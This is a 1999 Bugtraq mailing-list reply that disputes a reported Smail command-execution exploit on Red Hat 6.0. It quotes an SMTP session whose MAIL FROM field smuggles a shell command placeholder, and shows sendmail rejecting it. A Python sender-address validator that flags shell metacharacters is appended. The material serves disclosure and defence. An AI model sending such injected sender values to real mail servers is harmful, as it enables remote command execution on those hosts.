Bugtraq mailing list archives
RH6.0 local/remote command execution
From: nhaniff () WWW RCC RYERSON CA (Neezam Haniff)
Date: Wed, 6 Oct 1999 13:49:59 -0400
Hi, Here are some comments below...
The remote exploit is merely:

bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

I find it odd that this exploit could exist on a Red Hat 6.0 installation. sendmail 8.9.3 is the mailer that is installed and the way it's been configured, there's no way it would accept that sender address since it's not qualifiable. Please confirm this. This is what I get when I test this scenario on a Red Hat 6.0 system:

[[nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400
helo x.x
250 dhcp-160-190.x.x Hello IDENT:250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required

The only way someone could take advantage of this exploit is if their mailer configuration allows for the sender to be non-qualifiable.

Neezam.
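
Added example, not part of the original message and not sendmail's or Smail's code: a sender-address check in the spirit of the 553 rejection shown above, run over a constructed SMTP transcript. The policy (require local-part@domain with a dotted domain, refuse shell metacharacters) and the names check_sender and audit are assumptions made for illustration.

```python
import re

# Characters a shell would interpret if an address ever reached one unquoted.
# Deliberately stricter than RFC 5321, which permits some of these in a local part.
SHELL_META = set(";|&`$(){}<>\\'\"")

MAIL_FROM = re.compile(r"^MAIL FROM:\s*<?([^>]*)>?\s*$", re.IGNORECASE)


def check_sender(line):
    """Return (smtp_code, reasons) for one MAIL FROM command line."""
    m = MAIL_FROM.match(line.strip())
    if not m:
        return 501, ["syntax error"]
    addr = m.group(1).strip()
    if addr == "":
        return 250, []          # null sender <> is used for bounces
    reasons = []
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or "." not in domain:
        reasons.append("unqualified sender")
    if SHELL_META & set(addr):
        reasons.append("shell metacharacter")
    return (553 if reasons else 250), reasons


def audit(transcript):
    """Return (line, code, reasons) for every MAIL FROM in a transcript."""
    return [(l, *check_sender(l)) for l in transcript.splitlines()
            if l.upper().startswith("MAIL FROM:")]


# Constructed sample input; the first sender is the one quoted in the thread.
SAMPLE = """HELO x.x
MAIL FROM: ;/command/to/execute;
MAIL FROM:<alice@example.com>
MAIL FROM:<>
MAIL FROM: rpmmail
"""

if __name__ == "__main__":
    for line, code, reasons in audit(SAMPLE):
        print(code, line, "; ".join(reasons))
```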